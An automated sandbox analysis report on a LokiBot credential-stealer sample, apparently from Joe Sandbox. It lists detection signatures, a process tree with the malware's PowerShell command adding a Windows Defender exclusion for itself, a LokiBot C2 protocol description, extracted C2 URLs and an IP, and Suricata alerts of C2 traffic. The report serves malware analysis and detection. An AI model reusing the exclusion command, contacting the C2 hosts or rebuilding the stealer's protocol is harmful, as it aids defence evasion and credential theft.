Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561052
MD5:66b03d1aff27d81e62b53fc108806211
SHA1:2557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA256:59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
Tags:NETexeMSILuser-jstrosch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 66B03D1AFF27D81E62B53FC108806211)
    • powershell.exe (PID: 7708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7856 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • file.exe (PID: 7716 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 66B03D1AFF27D81E62B53FC108806211)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/maxzi/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x175f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x49bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 30 entries
          SourceRuleDescriptionAuthorStrings
          0.2.file.exe.37bf1e0.1.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            0.2.file.exe.37bf1e0.1.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            0.2.file.exe.37bf1e0.1.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            0.2.file.exe.37bf1e0.1.unpackLoki_1Loki Payloadkevoreilly
            • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x133fc:$a2: last_compatible_version
            0.2.file.exe.37bf1e0.1.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x123ff:$des3: 68 03 66 00 00
            • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            Click to see the 37 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7524, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7708, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7524, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7708, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7524, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7708, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-22T17:38:21.673105+010020243121A Network Trojan was detected192.168.2.44973394.156.177.4180TCP
            2024-11-22T17:38:23.332524+010020243121A Network Trojan was detected192.168.2.44973594.156.177.4180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-22T17:38:20.385794+010020253811Malware Command and Control Activity Detected192.168.2.44973394.156.177.4180TCP
            2024-11-22T17:38:22.053197+010020253811Malware Command and Control Activity Detected192.168.2.44973594.156.177.4180TCP
            2024-11-22T17:38:23.667763+010020253811Malware Command and Control Activity Detected192.168.2.44973694.156.177.4180TCP
            2024-11-22T17:38:25.419739+010020253811Malware Command and Control Activity Detected192.168.2.44973894.156.177.4180TCP
            2024-11-22T17:38:27.183872+010020253811Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
            2024-11-22T17:38:29.035149+010020253811Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
            2024-11-22T17:38:30.844447+010020253811Malware Command and Control Activity Detected192.168.2.44974194.156.177.4180TCP
            2024-11-22T17:38:32.663838+010020253811Malware Command and Control Activity Detected192.168.2.44974394.156.177.4180TCP
            2024-11-22T17:38:34.331046+010020253811Malware Command and Control Activity Detected192.168.2.44974594.156.177.4180TCP
            2024-11-22T17:38:36.401062+010020253811Malware Command and Control Activity Detected192.168.2.44974894.156.177.4180TCP
            2024-11-22T17:38:38.111286+010020253811Malware Command and Control Activity Detected192.168.2.44974994.156.177.4180TCP
            2024-11-22T17:38:39.948025+010020253811Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
            2024-11-22T17:38:41.659082+010020253811Malware Command and Control Activity Detected192.168.2.44975394.156.177.4180TCP
            2024-11-22T17:38:43.413430+010020253811Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
            2024-11-22T17:38:45.199702+010020253811Malware Command and Control Activity Detected192.168.2.44975594.156.177.4180TCP
            2024-11-22T17:38:46.970645+010020253811Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
            2024-11-22T17:38:48.693877+010020253811Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
            2024-11-22T17:38:50.493985+010020253811Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
            2024-11-22T17:38:52.309427+010020253811Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
            2024-11-22T17:38:54.159922+010020253811Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
            2024-11-22T17:38:56.007119+010020253811Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
            2024-11-22T17:38:57.847693+010020253811Malware Command and Control Activity Detected192.168.2.44976894.156.177.4180TCP
            2024-11-22T17:38:59.730255+010020253811Malware Command and Control Activity Detected192.168.2.44976994.156.177.4180TCP
            2024-11-22T17:39:01.391645+010020253811Malware Command and Control Activity Detected192.168.2.44977594.156.177.4180TCP
            2024-11-22T17:39:03.187495+010020253811Malware Command and Control Activity Detected192.168.2.44978194.156.177.4180TCP
            2024-11-22T17:39:04.874345+010020253811Malware Command and Control Activity Detected192.168.2.44978794.156.177.4180TCP
            2024-11-22T17:39:06.624697+010020253811Malware Command and Control Activity Detected192.168.2.44978894.156.177.4180TCP
            2024-11-22T17:39:08.251882+010020253811Malware Command and Control Activity Detected192.168.2.44979494.156.177.4180TCP
            2024-11-22T17:39:10.075035+010020253811Malware Command and Control Activity Detected192.168.2.44980094.156.177.4180TCP
            2024-11-22T17:39:11.694205+010020253811Malware Command and Control Activity Detected192.168.2.44980694.156.177.4180TCP
            2024-11-22T17:39:13.452854+010020253811Malware Command and Control Activity Detected192.168.2.44980794.156.177.4180TCP
            2024-11-22T17:39:15.106129+010020253811Malware Command and Control Activity Detected192.168.2.44981494.156.177.4180TCP
            2024-11-22T17:39:16.873576+010020253811Malware Command and Control Activity Detected192.168.2.44982094.156.177.4180TCP
            2024-11-22T17:39:18.772634+010020253811Malware Command and Control Activity Detected192.168.2.44982694.156.177.4180TCP
            2024-11-22T17:39:20.515914+010020253811Malware Command and Control Activity Detected192.168.2.44983094.156.177.4180TCP
            2024-11-22T17:39:22.314600+010020253811Malware Command and Control Activity Detected192.168.2.44983494.156.177.4180TCP
            2024-11-22T17:39:24.067071+010020253811Malware Command and Control Activity Detected192.168.2.44983994.156.177.4180TCP
            2024-11-22T17:39:25.697513+010020253811Malware Command and Control Activity Detected192.168.2.44984594.156.177.4180TCP
            2024-11-22T17:39:27.435691+010020253811Malware Command and Control Activity Detected192.168.2.44985194.156.177.4180TCP
            2024-11-22T17:39:29.277428+010020253811Malware Command and Control Activity Detected192.168.2.44985394.156.177.4180TCP
            2024-11-22T17:39:30.980502+010020253811Malware Command and Control Activity Detected192.168.2.44985894.156.177.4180TCP
            2024-11-22T17:39:32.779202+010020253811Malware Command and Control Activity Detected192.168.2.44986494.156.177.4180TCP
            2024-11-22T17:39:34.454700+010020253811Malware Command and Control Activity Detected192.168.2.44986994.156.177.4180TCP
            2024-11-22T17:39:36.638264+010020253811Malware Command and Control Activity Detected192.168.2.44987594.156.177.4180TCP
            2024-11-22T17:39:38.319161+010020253811Malware Command and Control Activity Detected192.168.2.44987894.156.177.4180TCP
            2024-11-22T17:39:40.156593+010020253811Malware Command and Control Activity Detected192.168.2.44988394.156.177.4180TCP
            2024-11-22T17:39:41.832002+010020253811Malware Command and Control Activity Detected192.168.2.44988994.156.177.4180TCP
            2024-11-22T17:39:43.599899+010020253811Malware Command and Control Activity Detected192.168.2.44989494.156.177.4180TCP
            2024-11-22T17:39:45.307094+010020253811Malware Command and Control Activity Detected192.168.2.44989894.156.177.4180TCP
            2024-11-22T17:39:47.159997+010020253811Malware Command and Control Activity Detected192.168.2.44990294.156.177.4180TCP
            2024-11-22T17:39:49.169189+010020253811Malware Command and Control Activity Detected192.168.2.44990794.156.177.4180TCP
            2024-11-22T17:39:50.892509+010020253811Malware Command and Control Activity Detected192.168.2.44991394.156.177.4180TCP
            2024-11-22T17:39:52.742489+010020253811Malware Command and Control Activity Detected192.168.2.44991794.156.177.4180TCP
            2024-11-22T17:39:54.532238+010020253811Malware Command and Control Activity Detected192.168.2.44992294.156.177.4180TCP
            2024-11-22T17:39:56.154638+010020253811Malware Command and Control Activity Detected192.168.2.44992694.156.177.4180TCP
            2024-11-22T17:39:57.905221+010020253811Malware Command and Control Activity Detected192.168.2.44993294.156.177.4180TCP
            2024-11-22T17:39:59.617555+010020253811Malware Command and Control Activity Detected192.168.2.44993794.156.177.4180TCP
            2024-11-22T17:40:01.461227+010020253811Malware Command and Control Activity Detected192.168.2.44994294.156.177.4180TCP
            2024-11-22T17:40:03.120405+010020253811Malware Command and Control Activity Detected192.168.2.44994594.156.177.4180TCP
            2024-11-22T17:40:04.910450+010020253811Malware Command and Control Activity Detected192.168.2.44995194.156.177.4180TCP
            2024-11-22T17:40:06.653374+010020253811Malware Command and Control Activity Detected192.168.2.44995794.156.177.4180TCP
            2024-11-22T17:40:08.480379+010020253811Malware Command and Control Activity Detected192.168.2.44996194.156.177.4180TCP
            2024-11-22T17:40:10.283380+010020253811Malware Command and Control Activity Detected192.168.2.44996594.156.177.4180TCP
            2024-11-22T17:40:11.940390+010020253811Malware Command and Control Activity Detected192.168.2.44997094.156.177.4180TCP
            2024-11-22T17:40:13.780404+010020253811Malware Command and Control Activity Detected192.168.2.44997694.156.177.4180TCP
            2024-11-22T17:40:15.455772+010020253811Malware Command and Control Activity Detected192.168.2.44998194.156.177.4180TCP
            2024-11-22T17:40:17.167831+010020253811Malware Command and Control Activity Detected192.168.2.44998494.156.177.4180TCP
            2024-11-22T17:40:18.923857+010020253811Malware Command and Control Activity Detected192.168.2.44999094.156.177.4180TCP
            2024-11-22T17:40:20.873102+010020253811Malware Command and Control Activity Detected192.168.2.44999594.156.177.4180TCP
            2024-11-22T17:40:22.672655+010020253811Malware Command and Control Activity Detected192.168.2.45000094.156.177.4180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-22T17:38:18.696905+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450000TCP
            2024-11-22T17:38:25.060056+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449736TCP
            2024-11-22T17:38:26.901213+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449738TCP
            2024-11-22T17:38:28.759253+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449739TCP
            2024-11-22T17:38:30.564948+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449740TCP
            2024-11-22T17:38:32.375028+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449741TCP
            2024-11-22T17:38:34.060918+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449743TCP
            2024-11-22T17:38:35.862948+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449745TCP
            2024-11-22T17:38:37.847124+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449748TCP
            2024-11-22T17:38:39.689057+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449749TCP
            2024-11-22T17:38:41.388207+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449751TCP
            2024-11-22T17:38:43.138286+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449753TCP
            2024-11-22T17:38:44.941143+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449754TCP
            2024-11-22T17:38:46.707141+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449755TCP
            2024-11-22T17:38:48.418123+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449756TCP
            2024-11-22T17:38:50.222754+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449757TCP
            2024-11-22T17:38:52.042226+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449758TCP
            2024-11-22T17:38:53.883990+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449759TCP
            2024-11-22T17:38:55.733469+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449760TCP
            2024-11-22T17:38:57.577179+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449762TCP
            2024-11-22T17:38:59.426546+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449768TCP
            2024-11-22T17:39:01.131407+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449769TCP
            2024-11-22T17:39:02.920927+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449775TCP
            2024-11-22T17:39:04.600571+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449781TCP
            2024-11-22T17:39:06.355478+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449787TCP
            2024-11-22T17:39:07.980188+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449788TCP
            2024-11-22T17:39:09.802909+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449794TCP
            2024-11-22T17:39:11.424821+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449800TCP
            2024-11-22T17:39:13.174861+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449806TCP
            2024-11-22T17:39:14.848103+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449807TCP
            2024-11-22T17:39:16.600800+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449814TCP
            2024-11-22T17:39:18.412865+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449820TCP
            2024-11-22T17:39:20.251127+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449826TCP
            2024-11-22T17:39:22.044326+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449830TCP
            2024-11-22T17:39:23.796270+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449834TCP
            2024-11-22T17:39:25.422629+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449839TCP
            2024-11-22T17:39:27.173859+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449845TCP
            2024-11-22T17:39:29.008704+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449851TCP
            2024-11-22T17:39:30.723332+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449853TCP
            2024-11-22T17:39:32.439587+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449858TCP
            2024-11-22T17:39:34.184105+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449864TCP
            2024-11-22T17:39:36.030123+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449869TCP
            2024-11-22T17:39:38.031130+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449875TCP
            2024-11-22T17:39:39.893944+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449878TCP
            2024-11-22T17:39:41.556669+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449883TCP
            2024-11-22T17:39:43.330266+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449889TCP
            2024-11-22T17:39:45.051310+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449894TCP
            2024-11-22T17:39:46.887092+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449898TCP
            2024-11-22T17:39:48.686602+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449902TCP
            2024-11-22T17:39:50.616894+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449907TCP
            2024-11-22T17:39:52.461465+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449913TCP
            2024-11-22T17:39:54.273217+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449917TCP
            2024-11-22T17:39:55.885986+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449922TCP
            2024-11-22T17:39:57.636701+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449926TCP
            2024-11-22T17:39:59.348827+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449932TCP
            2024-11-22T17:40:01.189433+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449937TCP
            2024-11-22T17:40:02.986093+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449942TCP
            2024-11-22T17:40:04.646103+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449945TCP
            2024-11-22T17:40:06.389791+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449951TCP
            2024-11-22T17:40:08.225755+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449957TCP
            2024-11-22T17:40:10.011540+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449961TCP
            2024-11-22T17:40:11.677531+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449965TCP
            2024-11-22T17:40:13.513836+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449970TCP
            2024-11-22T17:40:15.188463+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449976TCP
            2024-11-22T17:40:16.897699+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449981TCP
            2024-11-22T17:40:18.649027+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449984TCP
            2024-11-22T17:40:20.449796+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449990TCP
            2024-11-22T17:40:22.401027+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449995TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-22T17:38:24.937744+010020243131Malware Command and Control Activity Detected192.168.2.44973694.156.177.4180TCP
            2024-11-22T17:38:26.773102+010020243131Malware Command and Control Activity Detected192.168.2.44973894.156.177.4180TCP
            2024-11-22T17:38:28.639683+010020243131Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
            2024-11-22T17:38:30.444496+010020243131Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
            2024-11-22T17:38:32.251170+010020243131Malware Command and Control Activity Detected192.168.2.44974194.156.177.4180TCP
            2024-11-22T17:38:33.940877+010020243131Malware Command and Control Activity Detected192.168.2.44974394.156.177.4180TCP
            2024-11-22T17:38:35.739391+010020243131Malware Command and Control Activity Detected192.168.2.44974594.156.177.4180TCP
            2024-11-22T17:38:37.721603+010020243131Malware Command and Control Activity Detected192.168.2.44974894.156.177.4180TCP
            2024-11-22T17:38:39.565166+010020243131Malware Command and Control Activity Detected192.168.2.44974994.156.177.4180TCP
            2024-11-22T17:38:41.267831+010020243131Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
            2024-11-22T17:38:43.017979+010020243131Malware Command and Control Activity Detected192.168.2.44975394.156.177.4180TCP
            2024-11-22T17:38:44.821525+010020243131Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
            2024-11-22T17:38:46.587354+010020243131Malware Command and Control Activity Detected192.168.2.44975594.156.177.4180TCP
            2024-11-22T17:38:48.298382+010020243131Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
            2024-11-22T17:38:50.103232+010020243131Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
            2024-11-22T17:38:51.916181+010020243131Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
            2024-11-22T17:38:53.761108+010020243131Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
            2024-11-22T17:38:55.610382+010020243131Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
            2024-11-22T17:38:57.457422+010020243131Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
            2024-11-22T17:38:59.302710+010020243131Malware Command and Control Activity Detected192.168.2.44976894.156.177.4180TCP
            2024-11-22T17:39:01.010755+010020243131Malware Command and Control Activity Detected192.168.2.44976994.156.177.4180TCP
            2024-11-22T17:39:02.801173+010020243131Malware Command and Control Activity Detected192.168.2.44977594.156.177.4180TCP
            2024-11-22T17:39:04.480951+010020243131Malware Command and Control Activity Detected192.168.2.44978194.156.177.4180TCP
            2024-11-22T17:39:06.235877+010020243131Malware Command and Control Activity Detected192.168.2.44978794.156.177.4180TCP
            2024-11-22T17:39:07.860411+010020243131Malware Command and Control Activity Detected192.168.2.44978894.156.177.4180TCP
            2024-11-22T17:39:09.682146+010020243131Malware Command and Control Activity Detected192.168.2.44979494.156.177.4180TCP
            2024-11-22T17:39:11.305204+010020243131Malware Command and Control Activity Detected192.168.2.44980094.156.177.4180TCP
